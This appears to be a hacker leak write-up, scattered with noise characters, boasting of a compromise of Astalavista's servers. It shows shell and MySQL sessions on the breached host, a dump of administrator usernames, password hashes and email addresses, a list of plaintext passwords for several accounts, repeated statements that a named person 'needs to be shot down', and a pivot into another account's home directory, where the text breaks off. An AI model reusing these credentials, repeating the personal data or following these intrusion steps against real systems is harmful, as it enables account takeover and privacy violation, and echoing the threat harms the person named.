) g; r. ~3 z1 N1 M) Q( {" _% m<rss version=”2.0″>
8 Q! A' g- a( F+ L: l, E. Q <channel>2 G) }* I9 ^; {( Y
<title>ASTALAVISTA.com - Exploits</title>
+ e+ K* }# M& S U <link>http://www.astalavista.com/exploits</link>
1 C, {' W$ n4 s: n1 N& Z: B& S <description>All availably Exploits.</description>
) l" F: j! t3 R \- D/ ^ <language>en-us</language>$ R1 j+ n: ~* u- E0 [; y. G
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
- T# Y- f* r, V Q9 n! o* z: C F <docs>http://blogs.law.harvard.edu/tech/rss</docs>2 k; ]- j9 h6 u. W1 H; j; }
<generator>Astalavista.com</generator>
, v% `2 }: b3 o6 V4 h' u: Q# c3 G <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
& y" v/ `" g* h/ S) m </channel>
6 W8 a7 w# I0 [1 X</rss>’;
! i8 z4 l3 m0 ]: ^" J# R
0 Y% i" f$ w0 E1 w' N9 e if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
. s9 w K& _6 ^) c unlink (FULLPATH . ‘/feed/exploits.xml’);
/ m+ h7 ~8 N* ? M8 s9 s }4 a5 \; T( H0 z) i* m8 u$ P# O
& r( b, a/ ~' p' q file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
n7 ~1 z" @, F7 {: r[snip]9 _2 J7 [9 {3 S/ |2 @& v
% F, q# E6 [9 q- \' ksh-3.2$ cat exploits.sh# t( F* h/ G Q/ ]+ g1 F$ t
#!/bin/sh
: o/ I' w8 `% W. o/ K5 p/ R
1 r4 R/ l- ^3 \3 x4 o###########################################################$ ~% Q" U; t& @5 g {0 ?
# #! |# I$ ~* v' j) q! p2 Q
# Title: milw0rm exploits adder #, k8 E! j4 i9 Q$ {- Q
# Description: Add all milw0rm exploits to the #
$ u) D. e/ J6 `/ C) t% V3 K# Astalavista.com database #
2 y" g* E6 ?6 a7 V: M# #
0 Z. B5 {- q& F( u' r9 l+ J" F# Company: Astalavista Group #5 z( r" K) W' R( g$ G0 |
# Author: Paulo M. Santos #" H: S# C6 U. j) s7 g
# E-Mail: 链接标记paulo.santos@astalavista.ch #1 y7 o4 v$ v# X" R$ ~
# #) a ^) ]* e1 A6 J
###########################################################% `7 I! O3 c+ q+ K- \
4 [ V, d. O2 ?5 g1 _$ ?& |* H# path( s8 {/ J, y9 B! ~0 n) P
this_path=/home/com/public_html/modifications/cronjobs
% i) q7 d% |* e$ H F* l' s% E
0 |) y" m( Q/ j$ ^( f6 m& i# change directory. Z: i9 f) \3 w6 @. a
cd $this_path- N; E7 y3 ^8 M1 s8 r
cd tmp/
$ [9 z2 X0 O6 A: v2 U+ R$ O4 t! O; b2 F& o" O; K) A. M1 Z
# delete files' t$ a: I; E/ V0 e: l/ o- U* g. v
rm -rf milw0rm.tar.* &# b* m3 h! d3 G' }: Z
rm -rf milw0rm/ &, ~% r5 ^* ]) P6 w
# |; d; ~* x9 T9 R& V# wget milw0rm paket
; q+ | Q8 \1 {8 N! Kwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
* `5 c- j, w) y. O# q) K: q# I& } @# i8 e {* d
# extract milw0rm paket$ q, u5 U& y3 `3 U! W! }3 N
tar -xvf milw0rm.tar.bz2. a% |5 t3 x6 V7 x
E8 {( r1 _: h* j$ R9 t# C% H3 v
# change owner, \% {8 k* A& h7 R" [+ O+ ?- ]
chown -R com ." k& f$ [# H/ r) K2 f) d( I
chgrp -R com .9 t' f' d8 ?; a5 f
3 i& o/ O* O" ]" U8 n, a# execute php script
4 T2 K' t6 Q. C) G# k) ocd $this_path$ j) c$ h5 d9 Z. P
php -q exploits.php: z0 y4 Y4 W' Z. v5 @
& a+ A6 m8 H+ ~$ w# delete files
+ I1 O/ x d/ v9 B8 rrm -rf tmp/milw0rm.tar.*2 D% |5 H8 Z' d6 W4 g0 r2 R
rm -rf tmp/milw0rm/
/ s S* T8 K$ M) _( n+ G$ d1 a
7 ~: ]# _' u% H! l& `/ hsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
5 D- ~; \( }+ l8 E- T- ]$ _Paulo M. Santos needs to be shot down.5 c3 E) o8 ~3 ~6 ^: T( ^2 @9 d& k
% T. y. L' ?$ x+ [+ U- hmysql -u contrexxuser2 -p
2 `6 @ y0 S3 l( ~9 q) s% |Enter password:0 c! D& C6 K3 Z. m& H9 }7 r
Welcome to the MySQL monitor. Commands end with ; or \g., p! A P1 N+ G
Your MySQL connection id is 261694
* t/ Z* E: K7 g8 cServer version: 5.0.45-community-log MySQL Community Edition (GPL): g* A0 O$ Q2 I9 L0 B
/ w- G! _8 ]/ `( U2 i! }Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.2 q% x% D1 D8 ~' |' b
' W; L0 U/ `1 {: X$ W1 o6 g$ N
mysql> show databases;; O6 U S0 O% m! ^; m& N" v4 G
+——————–+
9 H2 Q7 N$ n6 H+ A* O) H| Database |
- M! P- f( S4 t- R9 r( i+——————–+% ~& }* @# ?7 ^5 X& O" M, o
| information_schema |. C: B! O6 e* D/ e& p
| com_contrexx2 |
* G1 S0 D" m3 G" p9 F" z| com_contrexx2_live |
: ?4 ]% H7 G, ]| test |
. E! h* D/ r5 {1 b7 v2 j; Z+——————–+
, \2 N5 |# {0 {8 N, _4 L4 rows in set (0.00 sec)4 ^8 q5 e2 G$ S9 `% o. I
6 ^" |; X6 F& K; S8 j1 fmysql> use com_contrexx2_live
- P# J+ f' Y" V0 W# z6 v: c4 {9 s- f, ADatabase changed$ \, O. _/ C3 s( _' V+ U1 o
mysql> show tables;* ~. w. T! X0 n/ y0 P$ k4 R* K9 S
+————————————————–+
- i! u& m B4 }( X W' j| Tables_in_com_contrexx2_live |
; K' ^$ V; u9 ?/ Z2 `) Y+————————————————–+
! O6 Z3 W$ Q- j9 k9 h| cc_banner_counter |
9 W+ y, H0 B, J4 y| cc_search_counter |
/ ~! N3 e; i0 y7 O" c| contrexx_access_group_dynamic_ids |9 D P7 B/ t, D' [" N
| contrexx_access_group_static_ids |
2 G' G0 Y0 M* k| contrexx_access_rel_user_group |
! P# G! A( R7 F+ K2 a7 J| contrexx_access_settings |
% i4 x+ y/ E4 d| contrexx_access_user_attribute |
( u2 s% K) l& B$ i0 d8 R+ ?6 c| contrexx_access_user_attribute_name |
: |0 l6 z4 R( i7 `| contrexx_access_user_attribute_value |1 g& c. u) W1 w& [) h& v6 ~* E* T
| contrexx_access_user_core_attribute |$ U* `0 Q8 ?( B/ Q/ n) r5 N- U
| contrexx_access_user_groups | E( E& d3 q1 n
| contrexx_access_user_mail | _9 m/ l1 r* T. Y1 n6 M, w
| contrexx_access_user_profile |
" `, G. k+ A9 L% a& t1 m/ k5 m! O) Z; a5 `| contrexx_access_user_title |. |# a3 ?/ v8 P% q
| contrexx_access_user_validity |: ~# T/ b$ M, \' w- ?; r, e
| contrexx_access_users |% A' W& R3 q! v1 O
| contrexx_backend_areas |
+ A' l$ b. W8 E7 J) Q. N4 N( G| contrexx_backups |. b. o: [9 ~2 e0 s2 d0 V- P- {
| contrexx_content |- ?) [6 m% \! @8 E
| contrexx_content_history |% l0 e g: h* H/ y, O. Q
| contrexx_content_logfile |8 k, O' S- [3 @( q' |" j. q
| contrexx_content_navigation |
' k' t3 z. c! v6 C6 E0 Z* I5 E| contrexx_content_navigation_history |$ f( a( {: O1 Q& b
| contrexx_ids |& \ m" \$ b+ L; |) ]. S4 x
| contrexx_languages |" C6 N( `' i+ T6 `& W
| contrexx_lib_country |/ x* I. [( L! _7 n1 f* u
| contrexx_log |
) o- Y" ?7 \: Q/ k2 L( Q Y) v| contrexx_module_alias_source |' A5 J' S; m, |7 |# q- d2 Z
| contrexx_module_alias_target |3 k1 C7 @; b4 Z, v* _) D
| contrexx_module_block_blocks |- @ w* H3 j6 j
| contrexx_module_block_rel_lang |0 ]9 O: ?! c) H* b
| contrexx_module_block_rel_pages |, A, l u6 q4 |9 b9 G
| contrexx_module_block_settings |9 H; l- I% |3 u9 T4 Z
| contrexx_module_blog_categories |% @0 q; N4 y; b
| contrexx_module_blog_comments |
- x+ g: i! ^1 Y| contrexx_module_blog_message_to_category |. O; v( v, R2 E
| contrexx_module_blog_messages |
V1 q2 z/ e* n' x& R: i3 K| contrexx_module_blog_messages_lang |7 {% X5 ^8 _& p% ]0 H: E! B
| contrexx_module_blog_networks |
0 P- _( b3 F( d( w| contrexx_module_blog_networks_lang |$ D5 D6 U Q" m$ G' K8 a
| contrexx_module_blog_settings |
) C3 V4 G0 O- ~( y| contrexx_module_blog_votes |3 g' h$ c/ M8 u, y, \2 @
| contrexx_module_calendar |
) H) z" J, r3 ?6 j& n| contrexx_module_calendar_access |
9 B, G: x \, `# o4 P6 r) M2 S| contrexx_module_calendar_categories |
1 U+ E. S" k3 M| contrexx_module_calendar_form_data |
: o# }) b" m! D- f' |. o| contrexx_module_calendar_form_fields | v5 T2 N- h7 h
| contrexx_module_calendar_registrations |: T7 z( `8 K- q0 t# @/ V
| contrexx_module_calendar_settings |
4 M9 z/ e& v" s5 A5 }| contrexx_module_calendar_style |
# ]: T! c9 y$ p( C+ F2 \| contrexx_module_contact_form |& `4 w$ d4 L* Y2 Q1 O
| contrexx_module_contact_form_data |
5 P9 O& B1 C7 G; w+ O! j| contrexx_module_contact_form_field |
g8 b8 q u- h! T+ G| contrexx_module_contact_settings |
4 L! {# g% c" F( R5 s( O8 {% o6 j| contrexx_module_data_categories |
/ T4 A3 A! T, i/ F: l. m# p; R| contrexx_module_data_message_to_category |
, I" q, ? r: v8 H& R) u, T' F| contrexx_module_data_messages |$ v% n/ U i/ |; o8 {9 C2 ]
| contrexx_module_data_messages_lang |
( F' x: Y; t4 a N' J# n6 @| contrexx_module_data_placeholders |( z% Z0 @$ J2 T3 Y( o5 j H
| contrexx_module_data_settings |6 a* x4 U6 t& Y: G
| contrexx_module_directory_access |
! O- i7 z# d2 Z: u. q9 || contrexx_module_directory_categories |
x/ o; s1 U- H" i- X| contrexx_module_directory_dir |1 i5 s! u: o% K5 d
| contrexx_module_directory_inputfields |
! f+ V5 @( s7 I Q$ a| contrexx_module_directory_levels |* `- ?5 v! s( p! n. Q I" ?' b
| contrexx_module_directory_mail |
' s9 c) [1 C5 _+ a8 A2 c| contrexx_module_directory_rel_dir_cat |1 v. q3 ?. d$ @2 J
| contrexx_module_directory_rel_dir_level |
7 \* w) ]+ M: q/ S2 Q1 M" |- M| contrexx_module_directory_settings |# W, D; j9 @3 ^6 u Z+ }) x3 O" Z$ ^& V
| contrexx_module_directory_settings_google |
" H+ l; c3 m4 R% u0 p0 [# h0 w| contrexx_module_directory_vote |% j2 X/ a" Y- H. F: g3 E$ F
| contrexx_module_docsys |
( ~2 H' @7 S- R: J/ e| contrexx_module_docsys_categories |; u% g- E+ u, M/ M s! {: X
| contrexx_module_egov_configuration |5 j- S) q8 L" P/ p
| contrexx_module_egov_orders |
) Z$ O5 L4 G- \) e| contrexx_module_egov_product_calendar |- Q) V% ^" l& R( z* m4 j1 ^
| contrexx_module_egov_product_fields | I% v0 a; J) C0 J4 x% j; z
| contrexx_module_egov_products |
/ [+ \9 j0 D# Z$ {4 Y5 q0 q| contrexx_module_egov_settings |
( U% P$ [* w* b: o- d; n| contrexx_module_exploits |& a: W3 V3 ?2 P/ j* W) Z
| contrexx_module_exploits_categories |! f1 u& R6 t4 v R/ R
| contrexx_module_feed_category |
4 @. @, A/ P/ P" L5 c) ]| contrexx_module_feed_news | R P) y8 |' S# K$ z% o
| contrexx_module_feed_newsml_association |
- M' u& q$ M+ t6 ]" j+ X' F| contrexx_module_feed_newsml_categories |
' G, N: U/ w# k: s3 H a| contrexx_module_feed_newsml_documents |
0 a! `. e. v. `| contrexx_module_feed_newsml_providers |6 ]' w4 V2 M4 ]7 |; N! ~6 _
| contrexx_module_forum_access |- }' [/ k/ R! v# b3 h6 L1 b
| contrexx_module_forum_categories |2 x! W: c! E. s2 [/ j
| contrexx_module_forum_categories_lang |& N. ^4 b/ P6 Z& S) i
| contrexx_module_forum_notification |" z+ I) [5 {2 g8 ^: Q
| contrexx_module_forum_postings |
2 [5 e, ^0 d+ f y5 C- C| contrexx_module_forum_rating |( E; i; J" P! v( w3 H z% G
| contrexx_module_forum_settings |
! q5 _4 W* w2 S7 E% f0 ]| contrexx_module_forum_statistics |6 ~' s/ r, H3 l% _' o
| contrexx_module_gallery_categories |
! H6 Z. s! ~6 F. p8 E" t| contrexx_module_gallery_comments |
6 c5 s* u) R6 Z* q| contrexx_module_gallery_language |" t7 B( O8 b8 f' J
| contrexx_module_gallery_language_pics |) Z+ A. E- {8 g- ^" r
| contrexx_module_gallery_pictures |: ~' `$ g, L" @* O" e5 o
| contrexx_module_gallery_settings |) @/ Z9 _0 q' O6 D
| contrexx_module_gallery_votes |* d5 v4 f3 t- c/ [3 q i
| contrexx_module_guestbook |+ Z3 K9 S- ?! Z1 w' w% E2 z/ p
| contrexx_module_guestbook_settings |- K* l+ `. `4 I5 g9 n
| contrexx_module_livecam |$ e0 z1 e: i1 R. y9 G2 E
| contrexx_module_livecam_settings |
" Z+ W9 }1 h, R3 \( M/ G| contrexx_module_market |
4 P; B# D( y" u0 j5 J0 a| contrexx_module_market_access |8 y; H' |1 @8 \: K7 I
| contrexx_module_market_categories |
G( i& A$ t# b2 y' ~| contrexx_module_market_mail |7 _7 P# l: a( D! J
| contrexx_module_market_paypal |) ], c; k1 S0 m1 t
| contrexx_module_market_settings |6 L" B6 H9 G8 Y1 B
| contrexx_module_market_spez_fields |$ v1 G3 W7 N) {' V' x1 R2 d! I8 C* v
| contrexx_module_mediadir_access |
! w% }$ m$ z/ H/ L: J2 _) k| contrexx_module_mediadir_categories | h6 j7 R4 h& W
| contrexx_module_mediadir_comments |
" Z- k% f S; Y$ f$ c| contrexx_module_mediadir_dir |
! G* `: }0 }2 }| contrexx_module_mediadir_inputfields |( @* i$ G- |! @, j, N3 o
| contrexx_module_mediadir_levels |! J# E: Z: P2 R# o: b$ H! Z$ T0 t, K
| contrexx_module_mediadir_mail |
7 Q: ~2 P \8 x! ]% k| contrexx_module_mediadir_rel_dir_cat |
2 L( X& P$ f: Z- M' s8 H| contrexx_module_mediadir_rel_dir_level |
! x/ R( g# x8 y6 v. {$ j| contrexx_module_mediadir_reports |6 v( l6 _, O8 j; h" f3 }9 ^, d
| contrexx_module_mediadir_settings |& P2 z( ?+ b. C X5 S
| contrexx_module_mediadir_settings_google |
# \3 A, r, [) S; e) }| contrexx_module_mediadir_vote |9 r6 G- c, ?6 N I2 M1 N% A
| contrexx_module_memberdir_directories |$ d& j9 h: a# E3 w F& r
| contrexx_module_memberdir_name |4 J# A* P# q. N* D
| contrexx_module_memberdir_settings |1 K+ s, S' P5 r6 u- h
| contrexx_module_memberdir_values |6 \5 W' i" A; I, j" t" ?" M
| contrexx_module_nettools_allowed_groups |4 y3 T0 y/ L: g9 e" t
| contrexx_module_nettools_settings |. X- h! @% d Z2 @$ y- p
| contrexx_module_news |% _- }' ~; B, T# R- x/ q5 {
| contrexx_module_news_access |
% T4 J/ ]1 B' Y' g5 v( ~9 b| contrexx_module_news_categories |% d( [& c6 |8 h4 O
| contrexx_module_news_settings |
, M) P* h* O9 r$ w. t& d8 B. c| contrexx_module_news_teaser_frame |! v3 B* G5 T) O# n
| contrexx_module_news_teaser_frame_templates |
" Q( Z6 e" ^2 P0 o+ b8 C# m| contrexx_module_news_ticker |/ s% g" f1 c! c+ Z( b
| contrexx_module_newsletter |
! s" y. f$ [! P% A7 k# x7 z| contrexx_module_newsletter_attachment |
7 q. H/ r6 z: s, E4 j| contrexx_module_newsletter_category |
7 ~0 R8 b& G, K7 T3 q+ r| contrexx_module_newsletter_confirm_mail |
- g! f/ z: z! _" f. ~ S# {9 e| contrexx_module_newsletter_rel_cat_news |. e4 q$ M% e0 b7 ]
| contrexx_module_newsletter_rel_user_cat |
. z8 i& R6 c h# \6 p) ]| contrexx_module_newsletter_settings |
* I- u. B' U4 t. m| contrexx_module_newsletter_template |
1 ]* \4 b, l! v) U6 p/ y ], G| contrexx_module_newsletter_tmp_sending |
$ r9 h6 t5 q: h4 u| contrexx_module_newsletter_user |
/ j% J# d/ n' o: E1 o. Y/ s| contrexx_module_newsletter_user_title |% {0 ~+ Q) ~4 {* G' I
| contrexx_module_onlinetools_defaultports |: V: P7 E/ i' g! a
| contrexx_module_onlinetools_defaultports_back |& R4 `$ _/ a* ?3 r
| contrexx_module_onlinetools_geolitecity_blocks |$ B+ N& Z1 V1 \8 ~( g
| contrexx_module_onlinetools_geolitecity_country |5 f7 n7 v; R+ E
| contrexx_module_onlinetools_geolitecity_location |% s% I- {2 O3 |0 G! m
| contrexx_module_podcast_category |7 C/ E. q' K/ Q. F) C% ]7 X. A
| contrexx_module_podcast_medium |
$ D" Y" y, D: j/ Q. U5 v2 Y* U| contrexx_module_podcast_rel_category_lang |
1 r; l* ?8 x9 f5 E7 c* U. B| contrexx_module_podcast_rel_medium_category |
1 m/ t( c5 H( }| contrexx_module_podcast_settings |- ` v+ [5 D/ N9 m
| contrexx_module_podcast_template |) n0 H' A* p& V9 V$ ]
| contrexx_module_proxydb |- j" S9 m3 Q2 W, W+ @+ _
| contrexx_module_recommend |( O$ {- g& ~; b4 {# i$ c
| contrexx_module_repository |) @ n; X$ t8 s k
| contrexx_module_securitynews_cats |
) S& W& b- ]- h+ T| contrexx_module_securitynews_feeds |( h' k% [" _; t; M
| contrexx_module_securitynews_news |
6 t- ]( \0 H3 e1 q- b5 d| contrexx_module_shop_categories |
; t+ ^- u$ u$ Z. `6 N0 ~' {| contrexx_module_shop_config |: h% ^' \- z1 }3 e/ _
| contrexx_module_shop_countries |
) S& I5 `+ z% U a2 U7 b7 ]" f| contrexx_module_shop_currencies |
; t, Q0 z5 m F' m* ^2 b% K, b| contrexx_module_shop_customers |
% e) {( q8 X: l9 j$ h* O| contrexx_module_shop_importimg |
1 T2 r0 U/ J+ H0 Q) v4 v| contrexx_module_shop_lsv |5 Z I3 X/ M, k8 |% ~4 p% Q
| contrexx_module_shop_mail |
% o$ X0 q9 z$ O# `9 N0 W| contrexx_module_shop_mail_content |/ x% z/ Z3 n; }: [- d
| contrexx_module_shop_manufacturer |
. l1 i) f9 @0 {0 F2 C! h, k( I| contrexx_module_shop_order_items |3 k) m p3 {8 z5 i; d
| contrexx_module_shop_order_items_attributes |( [0 }% i8 l9 z2 ?# P! G
| contrexx_module_shop_orders |
' h' _; ]6 f$ i ~7 r& s: ?| contrexx_module_shop_payment |5 ?4 q# z A! [6 M
| contrexx_module_shop_payment_processors |
# j0 o( f0 I6 f6 C1 `. W' C, J| contrexx_module_shop_pricelists |- |. f0 H) C" f1 \" [
| contrexx_module_shop_products |) [: C, ]/ [& C6 |5 C+ U
| contrexx_module_shop_products_attributes |
' M0 B3 u6 h) ]+ D9 I9 j| contrexx_module_shop_products_attributes_name |. |2 E4 x7 A; c2 S
| contrexx_module_shop_products_attributes_value |
6 @! P/ S, T: B( \) b6 m) X| contrexx_module_shop_products_downloads |
7 W9 r& ~! A5 U# e" M9 s' ~| contrexx_module_shop_rel_countries |
+ K$ W" N' t z+ N: R k0 S| contrexx_module_shop_rel_payment |
% p5 p+ L7 W9 s' n3 l# K. Q| contrexx_module_shop_rel_shipment |' x1 v* i/ s5 m! f. }1 S) U
| contrexx_module_shop_shipment_cost |
2 V+ Y9 l3 D# c( }; B/ T| contrexx_module_shop_shipper |
5 O ~! B i/ C. F( @| contrexx_module_shop_vat |+ }8 ]2 q, E: F% l4 a% {( U, p
| contrexx_module_shop_zones |
5 F. s) B9 Q! [4 z| contrexx_module_u2u_address_list |
/ s5 d0 e; w) H; x" j; z| contrexx_module_u2u_message_log |
1 O9 Z7 c7 ~: w7 t. Z3 H| contrexx_module_u2u_sent_messages |: R5 `! o8 @' c( j. b6 M0 }) I
| contrexx_module_u2u_settings |
5 e8 G9 N0 j9 h3 F' V| contrexx_module_u2u_user_log |
& U/ x0 i6 f8 P| contrexx_modules |; Y+ P& Z, z6 P# P; j: n
| contrexx_sessions |0 E1 }% F8 X b
| contrexx_settings |2 u4 ^, u! ?- G) O+ |' B6 p9 G
| contrexx_settings_smtp |0 D, f" N: d5 f. B9 D
| contrexx_skins |+ C- N- x; J; v, k( }4 `& a0 N
| contrexx_stats_browser |
+ C& N, _% h3 H' I| contrexx_stats_colourdepth |
: e$ Z5 T/ ~ } M. O) f0 ~| contrexx_stats_config |
+ }) x9 m. w+ w# @2 h| contrexx_stats_country |0 k/ `; p( b: V3 q& y; R$ w
| contrexx_stats_hostname |
6 C1 C6 K* j- x* Z9 t8 w5 W| contrexx_stats_javascript |# ~$ Q2 Y, d! @7 z# C
| contrexx_stats_operatingsystem |
( G$ n) O R3 ^ {( m# H| contrexx_stats_referer |
, f _# R+ R8 e* M/ y* j| contrexx_stats_requests |
9 A" b) D; f/ x3 W0 j# `| contrexx_stats_requests_summary |* w( ^. c. A$ F1 T7 y2 B0 d
| contrexx_stats_screenresolution |; K V; U" u( M( P7 W" v8 O0 p
| contrexx_stats_search |$ y" I; C% I g
| contrexx_stats_spiders |- c' B0 r4 Z) |" J( o# g
| contrexx_stats_spiders_summary |) |) k" e2 j4 V/ P2 Q, ` b. ^$ y. r/ M
| contrexx_stats_visitors |7 Q5 R6 e0 `. o2 }
| contrexx_stats_visitors_summary |
4 T2 A! R+ t9 \% d6 o2 F% e5 r| contrexx_voting_additionaldata |' Y# m* s7 G5 _# H3 H: B
| contrexx_voting_email |
# Q0 Q, [5 N E! h T7 k- U; Z0 ?8 ]| contrexx_voting_rel_email_system |! |. k2 E$ o* k6 v* Q5 y G2 ^# \& f
| contrexx_voting_results |' P0 M+ {7 z+ M
| contrexx_voting_system |
9 N2 M1 `1 ^5 i5 ?8 q$ j| foo |. i3 K$ w' h- k! [ i! L) i7 s
+————————————————–+
! ?5 M" s# |6 U: e227 rows in set (0.01 sec)
4 k" l, X# O% [! U7 `
& ]( a9 P6 [! d8 T9 J$ Ymysql> select count(*) as skids from contrexx_access_users;
7 {% F1 \4 S2 e: ?+——-+1 K) U* \8 `2 T
| skids |0 ?& f7 F: d I) t! G% G+ ` n
+——-+
|$ \! N7 ^6 P% C8 z| 53699 |4 f6 }" y, d$ @& N
+——-+8 b }4 j% ^1 s
1 row in set (0.00 sec)7 ^* U/ L, T; z. p
6 Z$ I6 `$ n# B9 \8 C4 D
mysql> describe contrexx_access_users;, `1 b# L6 _7 _! \
+——————+——————————————+——+—–+————–+—————-+8 h G; \* @0 L( @% d
| Field | Type | Null | Key | Default | Extra |
8 F3 L. D' W4 ]$ s+——————+——————————————+——+—–+————–+—————-+4 T% S5 t5 b. c8 I6 A
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |" L T5 V' Y) Z+ B
| is_admin | tinyint(1) unsigned | NO | | 0 | |$ Z" l4 z, O) y& B% `
| username | varchar(40) | YES | MUL | NULL | |. [' _% l% [, p( I, r; v3 x8 a
| password | varchar(32) | YES | | NULL | |9 g G/ k( l, {. j2 l) I/ D
| regdate | int(14) unsigned | NO | | 0 | |
7 q. F9 S$ L/ x$ x* N| expiration | int(14) unsigned | NO | | 0 | |
# o( {0 K: M/ ?5 K3 \| validity | int(10) unsigned | NO | | 0 | |
) \' S- S8 l! g7 L" k7 p, A0 h| last_auth | int(14) unsigned | NO | | 0 | |. [" ~- @% a6 b! e9 p
| last_activity | int(14) unsigned | NO | | 0 | |
0 Y/ @& E. Z% g! t# g| email | varchar(255) | YES | | NULL | |
& `+ P! _. Y& Z2 \2 \( Y| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
$ u5 P* ^7 ?, P7 v| frontend_lang_id | int(2) unsigned | NO | | 0 | |+ ~! q, q2 h% h- |0 s
| backend_lang_id | int(2) unsigned | NO | | 0 | |8 U. O R; }3 w1 Z) D
| active | tinyint(1) | NO | | 0 | |. G5 h3 J' j- p) y3 v$ |
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
6 S V+ d' C% @| restore_key | varchar(32) | NO | | | |5 W0 |" B& r$ S1 [% i
| restore_key_time | int(14) unsigned | NO | | 0 | |
$ ? Z) V4 n6 q3 h| u2u_active | enum(’0′,’1′) | NO | | 1 | |2 X: L4 J, n: f3 _' C- E
+——————+——————————————+——+—–+————–+—————-+& j7 w# F7 m L+ g4 C
18 rows in set (0.00 sec): C8 k! q; \( Z' X* Y
3 `9 t2 e; |" K5 h
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
! s+ V: o% g; [" J( ~, D, u+————+———————————-+—————————–+
' `1 w5 }5 m# Q& `| username | password | email |
" |9 G: J T- _2 h: k7 Q+————+———————————-+—————————–+
( v1 c4 W9 j' L: O' g+ O! [| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |% n! S/ [) U3 R- L
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
+ i4 L. u- [: e* y| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
9 x H6 G# K8 G) b5 r5 l( x Q| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
% Z. Z* O0 w# Z& K& @+————+———————————-+—————————–+
$ u% s" X/ `8 E/ s; B; B' A0 k) m4 rows in set (0.04 sec)
4 L9 g3 h" n; l0 j
& A: e# m6 p k. o0 Amysql> exit;
# y5 r7 a' ]6 n, U7 y; V M0 ZBye) @1 J: U1 i) N! r! i
9 D: R- {/ g/ v* |0 i. N; A
[~] There you go, your “team of security and IT professionals” is a joke.
/ j: [" q5 Y' |/ d9 a+ ]- F8 k g) ^ r: k2 m2 u
+——————————+
( }) ?6 _9 @6 F5 L1 s- dsystem:f82BN3+_*% u$ F7 l3 }5 O. }) H5 [5 T
Be1er0ph0r:belerophor4astacom) [" n' D0 j1 ^: i( I! S) f, v
prozac:asta4cms!
0 W3 X* `2 {! ~commander:mpbdaagf6m
; x/ p2 G1 r4 _( Q, k+ Z( rsykadul:ak29eral1 {6 C! ^ x" U9 X9 L: B4 i
+——————————+
" a' }1 a/ F0 `" l) Y
! A% J! f( x8 R8 g+ q[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
% [2 Q( L# B+ Y* A: g…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.! R) {( u8 W6 g$ d
/ |/ M% f$ `# G0 |' m! a. N[~] Lets move to astalavista.net now,
5 x: T* `% @- h) W, M1 u% r: k N3 |
3 {) G; S0 U) g' Z6 P0 XFrom <链接标记[url]https://www.astalavista.net/[/url]>:
. {6 O9 {4 E# Z( ^+ L: b>> Everyone knows that the best defense is a good offense.
- `% ?/ E* I4 j( o- t>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
$ Y7 U, G* s H/ J+ O. V2 y( N>> The ASTALAVISTA hacking & security community is the largest IT security community in the world. p6 F2 d! E2 N/ h
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
, d! E6 F8 b. P! R6 K, _, ]
. ^ W$ o/ M9 f1 b4 N>> Go ahead, try and hack our server . in a completely legal way!
& w1 w: t9 E( o>> Learn by doing: We offer our members tricky tasks and challenges on an! I; c) x0 q7 E* V3 u
>> ongoing basis so you can test your knowledge and abilities. You can also( i0 X( P. n0 @" Y0 L6 {2 s
>> demonstrate what you.ve mastered by taking part in regular hacker contests0 |7 \* }; A" X; K) Z
>> and war games* q# n) y9 V& L/ J- q- }, S3 j1 k" E
5 w6 G3 Y; N# u! Y8 X+ z
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
% u9 B% P5 z3 ~* x* P* a7 a" m( Q a" |6 j
[-] Tricky task: Find home dir of astalavista.net( l; B% _- E7 ]' b" w m% ]
; j( ?$ y% Z' P9 c- q+ wsh-3.2$ ls -la ~astanet
2 b. Z4 Y, h( n- w( Ltotal 48
& i2 N, U [: M" Wdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
$ H) v3 i# A* Y& t7 I+ kdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
3 G |1 m/ v% B1 f( J5 y9 @/ c5 M$ Z( Xdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
; y3 K- c3 P1 E Y( I-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
, W7 l/ T- e- p: R6 `-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
M- c' o" w+ b) K+ U-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile$ M2 ~! p8 g3 f/ G; A1 R" q
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
2 \% l) e# |2 X+ xdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
* g& h, S: Z- sdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap# i, }% D6 N9 \3 A0 n
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail `6 U/ i1 c: p% R9 N: l
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html7 ~- g, s ^" J# q+ a
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
2 j4 H: {' G4 m* I
' m9 X4 ~8 K( }4 q1 ~( Psh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/8 V' ]/ M1 ~" b8 z! F# F
sh-3.2$ ls -la
+ s* C0 |* l6 [6 k! }* Ytotal 200
4 P/ `' i3 P7 O9 i' J: B! h n9 ldrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
